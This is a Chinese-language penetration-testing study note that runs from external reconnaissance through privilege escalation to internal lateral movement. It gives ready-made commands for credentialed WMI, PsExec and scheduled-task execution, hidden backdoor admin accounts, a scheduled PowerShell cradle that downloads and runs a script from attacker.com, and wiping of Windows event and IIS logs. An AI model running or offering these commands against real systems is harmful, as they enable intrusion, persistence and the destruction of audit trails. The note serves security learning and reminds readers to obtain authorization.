记一次外网打点提权到内网横向(学习笔记一)
字数 1159 2025-08-18 17:33:11

外网打点提权到内网横向渗透学习笔记

一、信息收集阶段

1. 资产发现

  • 使用fofa进行目标资产探测,语法示例: 
    title="目标公司名称"
domain="目标域名"
ip="目标IP段"

2. 端口扫描

  • 使用nmap进行全端口扫描: 
    nmap -p- -T4 -v <target_ip> -oA allports
  • 对开放端口进行服务识别: 
    nmap -sV -sC -p <开放端口> <target_ip>

3. Web应用探测

  • 目录扫描工具: 
    dirsearch -u http://target.com -e php,asp,aspx,jsp
  • 指纹识别: 
    whatweb http://target.com

二、漏洞利用阶段

1. Web漏洞利用

  • 常见漏洞类型:
    • SQL注入
    • XSS
    • 文件上传
    • 文件包含
    • 反序列化

2. 中间件漏洞

  • 常见中间件漏洞:
    • Apache Struts2
    • Weblogic
    • JBoss
    • Tomcat

3. 服务漏洞利用

  • 常见服务漏洞:
    • Redis未授权访问
    • MySQL弱口令
    • FTP匿名登录
    • SMB漏洞(如永恒之蓝)

三、权限提升阶段

1. 本地信息收集

  • 系统信息: 
    systeminfo
whoami /priv
  • 网络信息: 
    ipconfig /all
netstat -ano
  • 用户信息: 
    net user
net localgroup administrators

2. 提权方法

  • 内核漏洞提权:
    • 使用wesng识别可用的内核漏洞
    • 常见提权exp:CVE-2021-4034、CVE-2020-1472等
  • 服务配置不当:
    • 可写服务
    • 不安全的服务权限
  • 凭证窃取:
    • 使用mimikatz获取明文密码
    • 从配置文件、注册表中寻找凭证

四、内网横向移动

1. 内网信息收集

  • 域信息: 
    net view /domain
net group "Domain Admins" /domain
  • 共享资源: 
    net view \\DC01

2. 凭证传递攻击

  • Pass-the-Hash (PtH)
  • Pass-the-Ticket (PtT)
  • Overpass-the-Hash

3. 横向移动技术

  • WMI执行: 
    wmic /node:<target> /user:<user> /password:<pass> process call create "cmd.exe /c whoami"
  • PsExec: 
    psexec.exe \\<target> -u <user> -p <pass> cmd.exe
  • 计划任务: 
    schtasks /create /s <target> /u <user> /p <pass> /tn "taskname" /tr "cmd.exe /c whoami" /sc once /st 00:00

五、权限维持

1. 后门技术

  • 创建隐藏用户: 
    net user backdoor$ Password123! /add
net localgroup administrators backdoor$ /add
  • 计划任务后门: 
    schtasks /create /tn "Update" /tr "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/rev.ps1')\"" /sc minute /mo 1

2. 隧道技术

  • SSH隧道: 
    ssh -D 1080 user@jump_host
  • frp/ngrok内网穿透

六、痕迹清理

1. 日志清理

  • 清除事件日志: 
    wevtutil cl security
wevtutil cl system
wevtutil cl application
  • 清除IIS日志: 
    del /q /f C:\inetpub\logs\LogFiles\W3SVC1\*

2. 文件清理

  • 删除上传的工具和脚本
  • 清除临时文件

七、防御规避

1. 免杀技术

  • 使用C#/Python重写工具
  • 使用内存加载技术
  • 混淆和加密payload

2. 权限控制

  • 使用低权限账户进行操作
  • 避免直接使用域管理员账户

八、工具清单

  1. 信息收集:

    • nmap
    • masscan
    • fofa/hunter

  2. 漏洞利用:

    • metasploit
    • sqlmap
    • burpsuite

  3. 内网渗透:

    • cobalt strike
    • mimikatz
    • impacket工具包

  4. 隧道工具:

    • frp
    • ngrok
    • chisel

  5. 后渗透:

    • PowerSploit
    • BloodHound
    • Seatbelt

九、注意事项

  1. 法律合规:确保获得授权
  2. 操作记录:详细记录每一步操作
  3. 影响评估:避免影响业务系统
  4. 报告编写:详细记录漏洞和修复建议

十、学习资源

  1. 书籍:

    • 《Metasploit渗透测试指南》
    • 《内网安全攻防:渗透测试实战指南》

  2. 在线课程:

    • OSCP认证课程
    • SANS SEC560

  3. 靶场:

    • HackTheBox
    • VulnHub
    • 国内各大SRC提供的测试环境

  4. 社区:

    • FreeBuf
    • 看雪学院
    • 先知社区
外网打点提权到内网横向渗透学习笔记 一、信息收集阶段 1. 资产发现 使用fofa进行目标资产探测,语法示例: 2. 端口扫描 使用nmap进行全端口扫描: 对开放端口进行服务识别: 3. Web应用探测 目录扫描工具: 指纹识别: 二、漏洞利用阶段 1. Web漏洞利用 常见漏洞类型: SQL注入 XSS 文件上传 文件包含 反序列化 2. 中间件漏洞 常见中间件漏洞: Apache Struts2 Weblogic JBoss Tomcat 3. 服务漏洞利用 常见服务漏洞: Redis未授权访问 MySQL弱口令 FTP匿名登录 SMB漏洞(如永恒之蓝) 三、权限提升阶段 1. 本地信息收集 系统信息: 网络信息: 用户信息: 2. 提权方法 内核漏洞提权: 使用wesng识别可用的内核漏洞 常见提权exp:CVE-2021-4034、CVE-2020-1472等 服务配置不当: 可写服务 不安全的服务权限 凭证窃取: 使用mimikatz获取明文密码 从配置文件、注册表中寻找凭证 四、内网横向移动 1. 内网信息收集 域信息: 共享资源: 2. 凭证传递攻击 Pass-the-Hash (PtH) Pass-the-Ticket (PtT) Overpass-the-Hash 3. 横向移动技术 WMI执行: PsExec: 计划任务: 五、权限维持 1. 后门技术 创建隐藏用户: 计划任务后门: 2. 隧道技术 SSH隧道: frp/ngrok内网穿透 六、痕迹清理 1. 日志清理 清除事件日志: 清除IIS日志: 2. 文件清理 删除上传的工具和脚本 清除临时文件 七、防御规避 1. 免杀技术 使用C#/Python重写工具 使用内存加载技术 混淆和加密payload 2. 权限控制 使用低权限账户进行操作 避免直接使用域管理员账户 八、工具清单 信息收集: nmap masscan fofa/hunter 漏洞利用: metasploit sqlmap burpsuite 内网渗透: cobalt strike mimikatz impacket工具包 隧道工具: frp ngrok chisel 后渗透: PowerSploit BloodHound Seatbelt 九、注意事项 法律合规:确保获得授权 操作记录:详细记录每一步操作 影响评估:避免影响业务系统 报告编写:详细记录漏洞和修复建议 十、学习资源 书籍: 《Metasploit渗透测试指南》 《内网安全攻防:渗透测试实战指南》 在线课程: OSCP认证课程 SANS SEC560 靶场: HackTheBox VulnHub 国内各大SRC提供的测试环境 社区: FreeBuf 看雪学院 先知社区